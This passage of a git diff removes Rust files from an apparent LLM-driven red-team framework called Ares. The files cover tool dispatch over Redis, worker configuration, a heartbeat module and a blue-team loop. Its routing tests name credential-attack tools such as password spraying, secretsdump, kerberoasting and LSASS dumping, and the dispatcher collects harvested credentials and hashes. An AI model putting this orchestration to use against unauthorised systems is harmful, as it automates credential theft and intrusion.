!AUTH_BEARING_TOOLS.contains(&call.name.as_str()) { - return None; - } - let username = call.arguments.get("username").and_then(|v| v.as_str())?; - let domain = call - .arguments - .get("domain") - .and_then(|v| v.as_str()) - .filter(|s| !s.is_empty()) - .unwrap_or("unknown"); - Some(format!( - "{}@{}", - username.to_lowercase(), - domain.to_lowercase() - )) -} - -/// Resolve the actual worker queue for a tool call. -/// -/// Most tools go to the calling agent's role queue. Netexec-dependent tools -/// are cross-routed to the `recon` queue where the binary exists. -pub(super) fn resolve_queue_role<'a>(role: &'a str, tool_name: &str) -> &'a str { - if role != "recon" && RECON_ROUTED_TOOLS.contains(&tool_name) { - "recon" - } else { - role - } -} - -/// Push structured discoveries from a tool result to the real-time -/// discovery list so the discovery poller publishes them to state. -/// -/// `tool_args` carries the tool call's input arguments — used to extract -/// the authenticating credential (username/domain) for lineage tracking. -pub(super) async fn push_realtime_discoveries( - queue: &TaskQueue, - operation_id: &str, - discoveries: &serde_json::Value, - tool_name: &str, - tool_args: &serde_json::Value, -) { - let discovery_key = format!("{DISCOVERY_KEY_PREFIX}:{operation_id}"); - let mut conn = queue.connection(); - - // Extract input credential context for lineage tracking - let input_username = tool_args - .get("username") - .or_else(|| tool_args.get("user")) - .and_then(|v| v.as_str()) - .unwrap_or(""); - let input_domain = tool_args - .get("domain") - .and_then(|v| v.as_str()) - .unwrap_or(""); - - // Push each discovery type as individual entries - let type_map: &[(&str, &str)] = &[ - ("hosts", "host"), - ("credentials", "credential"), - ("hashes", "hash"), - ("vulnerabilities", "vulnerability"), - ("shares", "share"), - ("discovered_users", "user"), - ]; - - let mut pushed = 0usize; - for &(key, disc_type) in type_map { - if let Some(items) = discoveries.get(key).and_then(|v| v.as_array()) { - for item in items { - let mut entry = serde_json::json!({ - "type": disc_type, - "data": item, - "source_tool": tool_name, - }); - // Attach input credential context for lineage resolution - if !input_username.is_empty() { - entry["input_username"] = serde_json::Value::String(input_username.to_string()); - entry["input_domain"] = serde_json::Value::String(input_domain.to_string()); - } - if let Ok(json) = serde_json::to_string(&entry) { - let _: anyhow::Result<(), _> = conn.lpush(&discovery_key, &json).await; - pushed += 1; - } - } - } - } - - if pushed > 0 { - debug!( - count = pushed, - tool = tool_name, - "Pushed real-time discoveries" - ); - } -} diff --git a/ares-orchestrator/src/tool_dispatcher/redis_dispatcher.rs b/ares-orchestrator/src/tool_dispatcher/redis_dispatcher.rs deleted file mode 100644 index 6a6400b8..00000000 --- a/ares-orchestrator/src/tool_dispatcher/redis_dispatcher.rs +++ /dev/null @@ -1,165 +0,0 @@ -//! Redis-backed tool dispatcher. - -use anyhow::{Context, Result}; -use redis::AsyncCommands; -use tracing::{debug, warn, Instrument}; - -use ares_core::telemetry::propagation::inject_traceparent; -use ares_core::telemetry::spans::{producer_span, Team}; -use ares_llm::{ToolCall, ToolExecResult}; - -use crate::task_queue::TaskQueue; - -use super::{ - extract_credential_key, push_realtime_discoveries, AuthThrottle, ToolExecRequest, - ToolExecResponse, RESULT_TTL_SECS, TOOL_EXEC_PREFIX, TOOL_RESULT_PREFIX, -}; - -/// Dispatches tool calls to workers via Redis queues. -/// -/// When tool results contain structured discoveries (hosts, credentials, etc.), -/// they are pushed to the `ares:discoveries:{op_id}` list for real-time -/// processing by the discovery poller — ensuring discoveries reach state -/// immediately rather than waiting for the task result consumer. -pub struct RedisToolDispatcher { - pub(super) queue: TaskQueue, - pub(super) tool_timeout: std::time::Duration, - pub(super) operation_id: String, - pub(super) auth_throttle: AuthThrottle, -} - -impl RedisToolDispatcher { - pub fn new(queue: TaskQueue, operation_id: String, auth_throttle: AuthThrottle) -> Self { - Self { - queue, - tool_timeout: std::time::Duration::from_secs(super::DEFAULT_TOOL_TIMEOUT_SECS), - operation_id, - auth_throttle, - } - } -} - -#[async_trait::async_trait] -impl ares_llm::ToolDispatcher for RedisToolDispatcher { - async fn dispatch_tool( - &self, - role: &str, - task_id: &str, - call: &ToolCall, - ) -> Result { - let effective_role = super::resolve_queue_role(role, &call.name); - let span = producer_span( - &format!("dispatch.{}", call.name), - role, - Team::Red, - &format!("ares-worker-{effective_role}"), - ); - - async { - // Rate-limit auth-bearing tools to prevent AD account lockout - if let Some(cred_key) = extract_credential_key(call) { - self.auth_throttle.acquire(&cred_key).await; - } - - let call_id = format!("{}_{}", call.name, uuid::Uuid::new_v4().simple()); - - // Inject trace context for cross-service span linking - let traceparent = inject_traceparent(&tracing::Span::current()); - - let request = ToolExecRequest { - call_id: call_id.clone(), - task_id: task_id.to_string(), - tool_name: call.name.clone(), - arguments: call.arguments.clone(), - traceparent, - operation_id: Some(self.operation_id.clone()), - }; - - let queue_key = format!("{TOOL_EXEC_PREFIX}:{effective_role}"); - let result_key = format!("{TOOL_RESULT_PREFIX}:{call_id}"); - let payload = - serde_json::to_string(&request).context("Failed to serialize tool exec request")?; - - debug!( - tool = %call.name, - call_id = %call_id, - queue = %queue_key, - effective_role = %effective_role, - "Dispatching tool call to worker" - ); - - // Push request to worker queue - let mut conn = self.queue.connection(); - conn.lpush::<_, _, ()>(&queue_key, &payload) - .await - .context("Failed to push tool exec request to Redis")?; - - // Wait for result with timeout - let timeout_secs = self.tool_timeout.as_secs().max(1) as f64; - let brpop_result: Option<(String, String)> = redis::cmd("BRPOP") - .arg(&result_key) - .arg(timeout_secs) - .query_async(&mut conn) - .await - .context("BRPOP failed for tool result")?; - - match brpop_result { - Some((_key, value)) => { - let response: ToolExecResponse = serde_json::from_str(&value) - .context("Failed to deserialize tool exec response")?; - - debug!( - tool = %call.name, - call_id = %call_id, - has_error = response.error.is_some(), - "Tool result received" - ); - - // Push discoveries to the real-time discovery list so - // the discovery poller publishes them to state immediately, - // independent of the task result consumer. - if let Some(ref disc) = response.discoveries { - push_realtime_discoveries( - &self.queue, - &self.operation_id, - disc, - &call.name, - &call.arguments, - ) - .await; - } - - Ok(ToolExecResult { - output: response.output, - error: response.error, - discoveries: response.discoveries, - }) - } - None => { - warn!( - tool = %call.name, - call_id = %call_id, - timeout_secs = timeout_secs, - "Tool execution timed out" - ); - - // Clean up any late result - let _: Result<(), _> = conn - .expire::<_, ()>(&result_key, RESULT_TTL_SECS as i64) - .await; - - Ok(ToolExecResult { - output: String::new(), - error: Some(format!( - "Tool '{}' timed out after {timeout_secs}s", - call.name - )), - discoveries: None, - }) - } - } - } - .instrument(span) - .await - } -} diff --git a/ares-orchestrator/src/tool_dispatcher/tests.rs b/ares-orchestrator/src/tool_dispatcher/tests.rs deleted file mode 100644 index 00d9940a..00000000 --- a/ares-orchestrator/src/tool_dispatcher/tests.rs +++ /dev/null @@ -1,98 +0,0 @@ -use super::*; - -#[test] -fn test_tool_exec_request_serialization() { - let req = ToolExecRequest { - call_id: "nmap_scan_abc123".into(), - task_id: "recon_def456".into(), - tool_name: "nmap_scan".into(), - arguments: serde_json::json!({"target": "192.168.58.0/24"}), - traceparent: None, - operation_id: Some("op-20260415-120000".into()), - }; - - let json = serde_json::to_string(&req).unwrap(); - let parsed: ToolExecRequest = serde_json::from_str(&json).unwrap(); - assert_eq!(parsed.call_id, "nmap_scan_abc123"); - assert_eq!(parsed.tool_name, "nmap_scan"); -} - -#[test] -fn test_tool_exec_response_deserialization() { - let json = r#"{"call_id":"nmap_scan_abc","output":"Found 5 hosts","error":null}"#; - let resp: ToolExecResponse = serde_json::from_str(json).unwrap(); - assert_eq!(resp.output, "Found 5 hosts"); - assert!(resp.error.is_none()); -} - -#[test] -fn test_tool_exec_response_with_error() { - let json = r#"{"call_id":"x","output":"","error":"Connection refused"}"#; - let resp: ToolExecResponse = serde_json::from_str(json).unwrap(); - assert_eq!(resp.error.as_deref(), Some("Connection refused")); -} - -#[test] -fn test_cross_role_routing_netexec_tools() { - // Netexec tools called from credential_access should route to recon - assert_eq!( - resolve_queue_role("credential_access", "password_spray"), - "recon" - ); - assert_eq!( - resolve_queue_role("credential_access", "username_as_password"), - "recon" - ); - assert_eq!( - resolve_queue_role("credential_access", "ldap_search_descriptions"), - "recon" - ); - assert_eq!( - resolve_queue_role("credential_access", "gpp_password_finder"), - "recon" - ); - assert_eq!( - resolve_queue_role("credential_access", "sysvol_script_search"), - "recon" - ); - assert_eq!( - resolve_queue_role("credential_access", "laps_dump"), - "recon" - ); - assert_eq!( - resolve_queue_role("credential_access", "smbclient_spider"), - "recon" - ); - assert_eq!( - resolve_queue_role("credential_access", "password_policy"), - "recon" - ); -} - -#[test] -fn test_cross_role_routing_native_tools_stay() { - // Tools native to credential_access should stay on credential_access - assert_eq!( - resolve_queue_role("credential_access", "secretsdump"), - "credential_access" - ); - assert_eq!( - resolve_queue_role("credential_access", "kerberoast"), - "credential_access" - ); - assert_eq!( - resolve_queue_role("credential_access", "lsassy"), - "credential_access" - ); -} - -#[test] -fn test_cross_role_routing_recon_stays_recon() { - // When recon itself calls these tools, they stay on recon - assert_eq!(resolve_queue_role("recon", "password_spray"), "recon"); - assert_eq!(resolve_queue_role("recon", "nmap_scan"), "recon"); - assert_eq!( - resolve_queue_role("recon", "ldap_search_descriptions"), - "recon" - ); -} diff --git a/ares-worker/Cargo.toml b/ares-worker/Cargo.toml deleted file mode 100644 index 35432364..00000000 --- a/ares-worker/Cargo.toml +++ /dev/null @@ -1,33 +0,0 @@ -[package] -name = "ares-worker" -version = "0.1.0" -edition = "2021" -description = "Worker binary for Ares red team multi-agent system" - -[[bin]] -name = "ares-worker" -path = "src/main.rs" - -[features] -default = ["blue"] -blue = ["ares-core/blue", "ares-llm/blue", "ares-tools/blue"] - -[dependencies] -ares-core = { path = "../ares-core", features = ["telemetry"] } -ares-llm = { path = "../ares-llm" } -ares-tools = { path = "../ares-tools" } -serde = { workspace = true } -serde_json = { workspace = true } -tokio = { workspace = true } -redis = { workspace = true } -chrono = { workspace = true } -tracing = { workspace = true } -tracing-subscriber = { workspace = true } -uuid = { workspace = true } -thiserror = { workspace = true } -anyhow = { workspace = true } -async-trait = "0.1" - -[build-dependencies] -serde = { version = "1", features = ["derive"] } -serde_yaml = "0.9" diff --git a/ares-worker/build.rs b/ares-worker/build.rs deleted file mode 100644 index d64a2249..00000000 --- a/ares-worker/build.rs +++ /dev/null @@ -1,95 +0,0 @@ -//! Build script — generates `tools_for_role()` from `tools.yaml`. -//! -//! The generated file is written to `$OUT_DIR/tool_tables.rs` and -//! included by `tool_check.rs` via `include!`. - -use std::collections::BTreeMap; -use std::env; -use std::fs; -use std::io::Write; -use std::path::Path; - -use serde::Deserialize; - -#[derive(Deserialize)] -struct ToolsFile { - roles: BTreeMap, -} - -#[derive(Deserialize)] -struct RoleDef { - tools: Vec, -} - -#[derive(Deserialize)] -struct ToolCategory { - binaries: Vec, -} - -fn main() { - let manifest_dir = env::var("CARGO_MANIFEST_DIR").unwrap(); - let yaml_path = Path::new(&manifest_dir) - .parent() // workspace root - .unwrap() - .join("tools.yaml"); - - println!("cargo::rerun-if-changed={}", yaml_path.display()); - - let yaml_content = fs::read_to_string(&yaml_path).unwrap_or_else(|e| { - panic!("Failed to read {}: {e}", yaml_path.display()); - }); - - let tools_file: ToolsFile = serde_yaml::from_str(&yaml_content).unwrap_or_else(|e| { - panic!("Failed to parse {}: {e}", yaml_path.display()); - }); - - let out_dir = env::var("OUT_DIR").unwrap(); - let dest = Path::new(&out_dir).join("tool_tables.rs"); - let mut f = fs::File::create(&dest).unwrap(); - - // Generate WORKER_ROLES constant (used in tests). - let role_names: Vec<&str> = tools_file.roles.keys().map(|s| s.as_str()).collect(); - writeln!(f, "/// All worker roles that have tool requirements.").unwrap(); - writeln!(f, "#[cfg(test)]").unwrap(); - writeln!(f, "const WORKER_ROLES: &[&str] = &[").unwrap(); - for role in &role_names { - writeln!(f, " {role:?},").unwrap(); - } - writeln!(f, "];\n").unwrap(); - - // Generate tools_for_role(). - writeln!( - f, - "/// Tools expected on each worker role's container image." - ) - .unwrap(); - writeln!(f, "///").unwrap(); - writeln!( - f, - "/// Auto-generated from `tools.yaml` — do not edit by hand." - ) - .unwrap(); - writeln!( - f, - "fn tools_for_role(role: &str) -> &'static [&'static str] {{" - ) - .unwrap(); - writeln!(f, " match role {{").unwrap(); - - for (role, def) in &tools_file.roles { - let binaries: Vec<&str> = def - .tools - .iter() - .flat_map(|cat| cat.binaries.iter().map(|s| s.as_str())) - .collect(); - writeln!(f, " {role:?} => &[").unwrap(); - for bin in &binaries { - writeln!(f, " {bin:?},").unwrap(); - } - writeln!(f, " ],").unwrap(); - } - - writeln!(f, " _ => &[],").unwrap(); - writeln!(f, " }}").unwrap(); - writeln!(f, "}}").unwrap(); -} diff --git a/ares-worker/src/blue_task_loop.rs b/ares-worker/src/blue_task_loop.rs deleted file mode 100644 index 5aecd3bd..00000000 --- a/ares-worker/src/blue_task_loop.rs +++ /dev/null @@ -1,385 +0,0 @@ -//! Blue team task consumption loop. -//! -//! Consumes tasks from `ares:blue:tasks:global:{role}`, runs the blue -//! team LLM agent loop with appropriate tools, and pushes results back -//! to `ares:blue:results:{task_id}`. -//! -//! This parallels the red team `task_loop` but uses: -//! - Blue task queue keys (`ares:blue:tasks:*`) -//! - Blue tool definitions from `ares_llm::tool_registry::blue` -//! - Blue prompt templates -//! - Blue state writer for investigation state mutations -//! - HTTP-based tools (Loki, Prometheus) instead of CLI wrappers - -use std::sync::Arc; -use std::time::Duration; - -use anyhow::Result; -use tracing::{debug, error, info, warn}; - -use ares_core::state::blue_task_queue::{BlueTaskMessage, BlueTaskQueue, BlueTaskResult}; -use ares_llm::tool_registry::blue::{self, BlueAgentRole}; -use ares_llm::{run_agent_loop, AgentLoopConfig, LlmProvider, LoopEndReason, ToolDispatcher}; - -use crate::config::WorkerConfig; -use crate::heartbeat::WorkerStatus; - -/// Run the blue team task consumption loop until shutdown. -pub async fn run_blue_task_loop( - config: &WorkerConfig, - conn: redis::aio::ConnectionManager, - provider: Box, - dispatcher: Arc, - model_name: String, - status_tx: tokio::sync::watch::Sender, - shutdown: Arc, -) -> Result<()> { - let role = parse_blue_role(&config.worker_role); - let role_str = role.as_str(); - - info!( - role = role_str, - agent = %config.agent_name, - "Starting blue team task loop" - ); - - let mut task_queue = BlueTaskQueue::from_conn(conn); - - let mut retry_delay = Duration::from_secs(1); - let max_retry_delay = Duration::from_secs(60); - - loop { - let poll_result = tokio::select! { - result = task_queue.poll_global_task(role_str, config.poll_timeout.as_secs_f64()) => result, - _ = shutdown.notified() => { - info!("Blue task loop: shutdown signalled"); - return Ok(()); - } - }; - - match poll_result { - Ok(Some(task)) => { - retry_delay = Duration::from_secs(1); - - let _ = status_tx.send(WorkerStatus { - status: "busy".to_string(), - current_task: Some(task.task_id.clone()), - }); - - // Send blue team heartbeat - let _ = task_queue - .send_heartbeat( - &config.agent_name, - "busy", - Some(&task.task_id), - role_str, - Some(&task.investigation_id), - ) - .await; - - // Execute the blue team task - let result = execute_blue_task( - &task, - role, - provider.as_ref(), - Arc::clone(&dispatcher), - &model_name, - &config.agent_name, - ) - .await; - - // Push result - if let Err(e) = task_queue.send_result(&result).await { - error!( - task_id = %task.task_id, - err = %e, - "Failed to send blue task result" - ); - } - - let _ = status_tx.send(WorkerStatus { - status: "idle".to_string(), - current_task: None, - }); - - let _ = task_queue - .send_heartbeat( - &config.agent_name, - "idle", - None, - role_str, - Some(&task.investigation_id), - ) - .await; - } - Ok(None) => { - retry_delay = Duration::from_secs(1); - } - Err(e) => { - let error_str = e.to_string().to_lowercase(); - let is_conn_error = ["connection", "closed", "timeout", "broken", "reset"] - .iter() - .any(|kw| error_str.contains(kw)); - - if is_conn_error { - warn!( - delay_secs = retry_delay.as_secs(), - "Blue task loop: connection error, retrying: {e}" - ); - tokio::select! { - _ = tokio::time::sleep(retry_delay) => {} - _ = shutdown.notified() => return Ok(()), - } - retry_delay = (retry_delay * 2).min(max_retry_delay); - } else { - error!("Blue task loop: non-connection error: {e}"); - tokio::select! { - _ = tokio::time::sleep(Duration::from_secs(5)) => {} - _ = shutdown.notified() => return Ok(()), - } - retry_delay = Duration::from_secs(1); - } - } - } - } -} - -/// Execute a single blue team task through the LLM agent loop. -async fn execute_blue_task( - task: &BlueTaskMessage, - role: BlueAgentRole, - provider: &dyn LlmProvider, - dispatcher: Arc, - model_name: &str, - agent_name: &str, -) -> BlueTaskResult { - info!( - task_id = %task.task_id, - task_type = %task.task_type, - role = role.as_str(), - investigation_id = %task.investigation_id, - "Executing blue team task" - ); - - // Build tools for this role - let tools = blue::blue_tools_for_role(role); - let capabilities: Vec = tools - .iter() - .filter(|t| !blue::is_blue_callback_tool(&t.name)) - .map(|t| t.name.clone()) - .collect(); - - // Build system prompt - let system_prompt = - match ares_llm::prompt::blue::build_blue_system_prompt(role.as_str(), &capabilities) { - Ok(p) => p, - Err(e) => { - return BlueTaskResult::failure( - &task.task_id, - &task.investigation_id, - format!("Failed to build system prompt: {e}"), - agent_name, - ); - } - }; - - // Build task prompt - // First try to load investigation state summary (best-effort) - let state_summary = "Investigation in progress.".to_string(); - - let task_prompt = match ares_llm::prompt::blue::generate_blue_task_prompt( - &task.task_type, - &task.task_id, - &task.params, - &state_summary, - ) { - Some(p) => p, - None => { - // Fallback: use raw params as prompt - format!( - "## Task: {}\n\nType: {}\nInvestigation: {}\n\nParameters:\n```json\n{}\n```\n\n\ - Complete this task and call the appropriate completion callback.", - task.task_id, - task.task_type, - task.investigation_id, - serde_json::to_string_pretty(&task.params).unwrap_or_default() - ) - } - }; - - let config = AgentLoopConfig { - model: model_name.to_string(), - max_steps: 50, - max_tool_calls_per_name: 25, - ..AgentLoopConfig::default() - }; - - // Run the agent loop - let outcome = run_agent_loop( - provider, - dispatcher, - &config, - &system_prompt, - &task_prompt, - role.as_str(), - &task.task_id, - &tools, - None, // No custom callback handler for worker tasks - ) - .await; - - // Convert outcome to BlueTaskResult - match &outcome.reason { - LoopEndReason::TaskComplete { result, .. } => { - info!( - task_id = %task.task_id, - steps = outcome.steps, - tool_calls = outcome.tool_calls_dispatched, - "Blue task completed" - ); - BlueTaskResult::success( - &task.task_id, - &task.investigation_id, - serde_json::json!({ - "summary": result, - "steps": outcome.steps, - "tool_calls": outcome.tool_calls_dispatched, - }), - agent_name, - ) - } - LoopEndReason::EndTurn { content } => BlueTaskResult::success( - &task.task_id, - &task.investigation_id, - serde_json::json!({ - "summary": content, - "steps": outcome.steps, - }), - agent_name, - ), - LoopEndReason::RequestAssistance { issue, context } => BlueTaskResult::failure( - &task.task_id, - &task.investigation_id, - format!("Assistance needed: {issue} (context: {context})"), - agent_name, - ), - LoopEndReason::MaxSteps => { - warn!(task_id = %task.task_id, steps = outcome.steps, "Blue task hit max steps"); - BlueTaskResult::failure( - &task.task_id, - &task.investigation_id, - format!("Hit max steps ({})", outcome.steps), - agent_name, - ) - } - LoopEndReason::MaxTokens => BlueTaskResult::failure( - &task.task_id, - &task.investigation_id, - "Hit max tokens".into(), - agent_name, - ), - LoopEndReason::Error(err) => { - error!(task_id = %task.task_id, err = %err, "Blue task error"); - BlueTaskResult::failure( - &task.task_id, - &task.investigation_id, - err.clone(), - agent_name, - ) - } - } -} - -/// Parse a worker role string into a BlueAgentRole. -fn parse_blue_role(role: &str) -> BlueAgentRole { - match role { - "triage" => BlueAgentRole::Triage, - "threat_hunter" => BlueAgentRole::ThreatHunter, - "lateral_analyst" => BlueAgentRole::LateralAnalyst, - "escalation_triage" => BlueAgentRole::EscalationTriage, - "blue_orchestrator" => BlueAgentRole::Orchestrator, - _ => { - warn!(role = role, "Unknown blue team role, defaulting to Triage"); - BlueAgentRole::Triage - } - } -} - -/// Blue team tool dispatcher that handles HTTP-based tools locally. -/// -/// Blue team tools (Loki, Prometheus, detection queries) are HTTP-based -/// and don't need worker dispatch — they run in-process. -pub struct BlueLocalToolDispatcher; - -impl BlueLocalToolDispatcher { - pub fn new() -> Self { - Self - } -} - -#[async_trait::async_trait] -impl ToolDispatcher for BlueLocalToolDispatcher { - async fn dispatch_tool( - &self, - _role: &str, - _task_id: &str, - call: &ares_llm::ToolCall, - ) -> Result { - debug!(tool = %call.name, "Executing blue team tool locally"); - - // Check if this is a blue team HTTP tool - if ares_tools::blue::is_blue_tool(&call.name) { - match ares_tools::blue::dispatch_blue(&call.name, &call.arguments).await { - Ok(output) => { - let error = if output.success { - None - } else { - Some(output.stderr.clone()) - }; - Ok(ares_llm::ToolExecResult { - output: output.stdout, - error, - discoveries: None, - }) - } - Err(e) => Ok(ares_llm::ToolExecResult { - output: String::new(), - error: Some(e.to_string()), - discoveries: None, - }), - } - } else { - // Unknown tool - Ok(ares_llm::ToolExecResult { - output: String::new(), - error: Some(format!("Unknown blue team tool: {}", call.name)), - discoveries: None, - }) - } - } -} - -#[cfg(test)] -mod tests { - use super::*; - - #[test] - fn test_parse_blue_role() { - assert_eq!(parse_blue_role("triage").as_str(), "triage"); - assert_eq!(parse_blue_role("threat_hunter").as_str(), "threat_hunter"); - assert_eq!( - parse_blue_role("lateral_analyst").as_str(), - "lateral_analyst" - ); - assert_eq!( - parse_blue_role("escalation_triage").as_str(), - "escalation_triage" - ); - assert_eq!( - parse_blue_role("blue_orchestrator").as_str(), - "blue_orchestrator" - ); - // Unknown defaults to triage - assert_eq!(parse_blue_role("unknown").as_str(), "triage"); - } -} diff --git a/ares-worker/src/config.rs b/ares-worker/src/config.rs deleted file mode 100644 index d3816b1a..00000000 --- a/ares-worker/src/config.rs +++ /dev/null @@ -1,199 +0,0 @@ -//! Worker configuration from environment variables. -//! -//! Maps to the Python config module's `get_redis_url()`, `get_agent_task_timeout()`, -//! and worker-specific env vars used in `_worker.py`. - -use std::env; -use std::time::Duration; - -/// Worker execution mode. -#[derive(Debug, Clone, PartialEq, Eq)] -pub enum WorkerMode { - /// Full task execution: consume from `ares:tasks:{role}`, expand composite - /// tasks, run tools, push results. This is the default mode used when - /// Python workers or standalone Rust workers handle entire tasks. - Task, - - /// Thin tool executor: consume individual tool calls from - /// `ares:tool_exec:{role}`, dispatch via `ares_tools::dispatch()`, push - /// results to `ares:tool_results:{call_id}`. Used when the Rust - /// orchestrator drives the LLM agent loop (ARES_LLM_MODEL). - ToolExec, - - /// Blue team task execution: consume from `ares:blue:tasks:global:{role}`, - /// run the blue team LLM agent loop with HTTP-based tools (Loki, - /// Prometheus, detection queries), push results to `ares:blue:results:`. - #[cfg(feature = "blue")] - BlueTask, -} - -/// Worker configuration parsed from environment variables. -#[derive(Debug, Clone)] -pub struct WorkerConfig { - /// Redis connection URL (ARES_REDIS_URL). - pub redis_url: String, - - /// Worker role matching `AgentRole` values: credential_access, cracker, lateral, acl, privesc, coercion. - pub worker_role: String, - - /// Kubernetes pod name (HOSTNAME fallback). - pub pod_name: String, - - /// Logical agent name derived from role (e.g., "ares-lateral-agent"). - pub agent_name: String, - - /// Active operation ID, if known at startup. - pub operation_id: Option, - - /// Worker mode: "task" (default) or "tool_exec" (ARES_WORKER_MODE). - pub mode: WorkerMode, - - /// Maximum time for a single LLM agent task before kill (ARES_AGENT_TASK_TIMEOUT). - /// Default: 600 seconds. - pub task_timeout: Duration, - - /// Heartbeat interval — how often we refresh `ares:heartbeat:{agent}`. - /// Default: 15 seconds. - pub heartbeat_interval: Duration, - - /// Heartbeat TTL in Redis. Must be > heartbeat_interval. - /// Default: 60 seconds (matches Python's HEARTBEAT_TTL). - pub heartbeat_ttl: Duration, - - /// BLPOP timeout for polling the task queue. - /// Default: 5 seconds (matches Python's poll_task default). - pub poll_timeout: Duration, -} - -impl WorkerConfig { - /// Parse configuration from environment variables. - /// - /// Required: - /// - `ARES_REDIS_URL` — Redis connection string - /// - `ARES_WORKER_ROLE` — Worker role (credential_access, cracker, lateral, acl, privesc, coercion) - /// - /// Optional: - /// - `ARES_POD_NAME` / `HOSTNAME` — Pod name (default: "unknown") - /// - `ARES_OPERATION_ID` — Active operation ID - /// - `ARES_WORKER_MODE` — "task" (default) or "tool_exec" - /// - `ARES_AGENT_TASK_TIMEOUT` — Task timeout in seconds (default: 600) - /// - `ARES_HEARTBEAT_INTERVAL` — Heartbeat interval in seconds (default: 15) - /// - `ARES_HEARTBEAT_TTL` — Heartbeat TTL in seconds (default: 60) - /// - `ARES_POLL_TIMEOUT` — BLPOP timeout in seconds (default: 5) - pub fn from_env() -> anyhow::Result { - let redis_url = env::var("ARES_REDIS_URL") - .map_err(|_| anyhow::anyhow!("ARES_REDIS_URL is required"))?; - - let worker_role = env::var("ARES_WORKER_ROLE") - .map_err(|_| anyhow::anyhow!("ARES_WORKER_ROLE is required"))?; - - let pod_name = env::var("ARES_POD_NAME") - .or_else(|_| env::var("HOSTNAME")) - .unwrap_or_else(|_| "unknown".to_string()); - - let agent_name = format!("ares-{}-agent", worker_role.replace('_', "-")); - - let operation_id = env::var("ARES_OPERATION_ID").ok(); - - let mode = match env::var("ARES_WORKER_MODE").as_deref() { - Ok("tool_exec") => WorkerMode::ToolExec, - #[cfg(feature = "blue")] - Ok("blue_task") => WorkerMode::BlueTask, - _ => WorkerMode::Task, - }; - - let task_timeout = Duration::from_secs( - env::var("ARES_AGENT_TASK_TIMEOUT") - .ok() - .and_then(|v| v.parse::().ok()) - .unwrap_or(600), - ); - - let heartbeat_interval = Duration::from_secs( - env::var("ARES_HEARTBEAT_INTERVAL") - .ok() - .and_then(|v| v.parse::().ok()) - .unwrap_or(15), - ); - - let heartbeat_ttl = Duration::from_secs( - env::var("ARES_HEARTBEAT_TTL") - .ok() - .and_then(|v| v.parse::().ok()) - .unwrap_or(60), - ); - - let poll_timeout = Duration::from_secs( - env::var("ARES_POLL_TIMEOUT") - .ok() - .and_then(|v| v.parse::().ok()) - .unwrap_or(5), - ); - - Ok(Self { - redis_url, - worker_role, - pod_name, - agent_name, - operation_id, - mode, - task_timeout, - heartbeat_interval, - heartbeat_ttl, - poll_timeout, - }) - } -} - -#[cfg(test)] -mod tests { - use super::*; - - /// Combined test to avoid env var race conditions between parallel tests. - #[test] - fn from_env_all_scenarios() { - // Missing redis URL fails - std::env::remove_var("ARES_REDIS_URL"); - std::env::set_var("ARES_WORKER_ROLE", "recon"); - assert!(WorkerConfig::from_env().is_err()); - - // Missing role fails - std::env::set_var("ARES_REDIS_URL", "redis://localhost"); - std::env::remove_var("ARES_WORKER_ROLE"); - assert!(WorkerConfig::from_env().is_err()); - - // Defaults applied - std::env::set_var("ARES_WORKER_ROLE", "recon"); - std::env::remove_var("ARES_WORKER_MODE"); - let c = WorkerConfig::from_env().unwrap(); - assert_eq!(c.task_timeout, Duration::from_secs(600)); - assert_eq!(c.heartbeat_interval, Duration::from_secs(15)); - assert_eq!(c.heartbeat_ttl, Duration::from_secs(60)); - assert_eq!(c.poll_timeout, Duration::from_secs(5)); - assert!(c.operation_id.is_none()); - assert_eq!(c.mode, WorkerMode::Task); - - // Worker mode: tool_exec - std::env::set_var("ARES_WORKER_MODE", "tool_exec"); - let c = WorkerConfig::from_env().unwrap(); - assert_eq!(c.mode, WorkerMode::ToolExec); - - // Worker mode: blue_task - #[cfg(feature = "blue")] - { - std::env::set_var("ARES_WORKER_MODE", "blue_task"); - let c = WorkerConfig::from_env().unwrap(); - assert_eq!(c.mode, WorkerMode::BlueTask); - std::env::remove_var("ARES_WORKER_MODE"); - } - - // Agent name from role - std::env::set_var("ARES_WORKER_ROLE", "credential_access"); - let c = WorkerConfig::from_env().unwrap(); - assert_eq!(c.agent_name, "ares-credential-access-agent"); - assert_eq!(c.worker_role, "credential_access"); - - std::env::remove_var("ARES_REDIS_URL"); - std::env::remove_var("ARES_WORKER_ROLE"); - } -} diff --git a/ares-worker/src/heartbeat.rs b/ares-worker/src/heartbeat.rs deleted file mode 100644 index cc3cf1e9..00000000 --- a/ares-worker/src/heartbeat.rs +++ /dev/null @@ -1,155 +0,0 @@ -//! Background heartbeat task. -//! -//! Spawns a tokio task that periodically writes to `ares:heartbeat:{agent_name}` -//! with a TTL, matching the Python `_threaded_heartbeat_loop` in `_worker.py`. -//! -//! The heartbeat runs independently of the GIL-bound task loop, ensuring the -//! orchestrator always knows the worker is alive even during long Python calls. - -use std::sync::Arc; -use std::time::Duration; - -use chrono::Utc; -use redis::AsyncCommands; -use tokio::sync::watch; -use tokio::task::JoinHandle; -use tracing::{debug, warn}; - -/// Heartbeat key prefix — matches `RedisTaskQueue.HEARTBEAT_PREFIX` in Python. -const HEARTBEAT_PREFIX: &str = "ares:heartbeat"; - -/// Current worker status, shared between the task loop and heartbeat task. -#[derive(Debug, Clone)] -pub struct WorkerStatus { - /// "idle" or "busy" - pub status: String, - /// Current task ID if busy, None if idle. - pub current_task: Option, -} - -impl Default for WorkerStatus { - fn default() -> Self { - Self { - status: "idle".to_string(), - current_task: None, - } - } -} - -/// Handle to the background heartbeat task. Drop to stop. -pub struct HeartbeatHandle { - _handle: JoinHandle<()>, -} - -/// Spawn the background heartbeat loop. -/// -/// Returns a `HeartbeatHandle` (drop it or abort to stop) and a `watch::Sender` -/// the task loop uses to update current status. -#[allow(clippy::too_many_arguments)] -pub fn spawn_heartbeat( - conn: redis::aio::ConnectionManager, - agent_name: String, - pod_name: String, - role: String, - operation_id: Option, - interval: Duration, - ttl: Duration, - shutdown: Arc, -) -> (HeartbeatHandle, watch::Sender) { - let (status_tx, status_rx) = watch::channel(WorkerStatus::default()); - - let handle = tokio::spawn(heartbeat_loop( - conn, - agent_name, - pod_name, - role, - operation_id, - interval, - ttl, - status_rx, - shutdown, - )); - - (HeartbeatHandle { _handle: handle }, status_tx) -} - -#[allow(clippy::too_many_arguments)] -async fn heartbeat_loop( - mut conn: redis::aio::ConnectionManager, - agent_name: String, - pod_name: String, - role: String, - operation_id: Option, - interval: Duration, - ttl: Duration, - status_rx: watch::Receiver, - shutdown: Arc, -) { - let heartbeat_key = 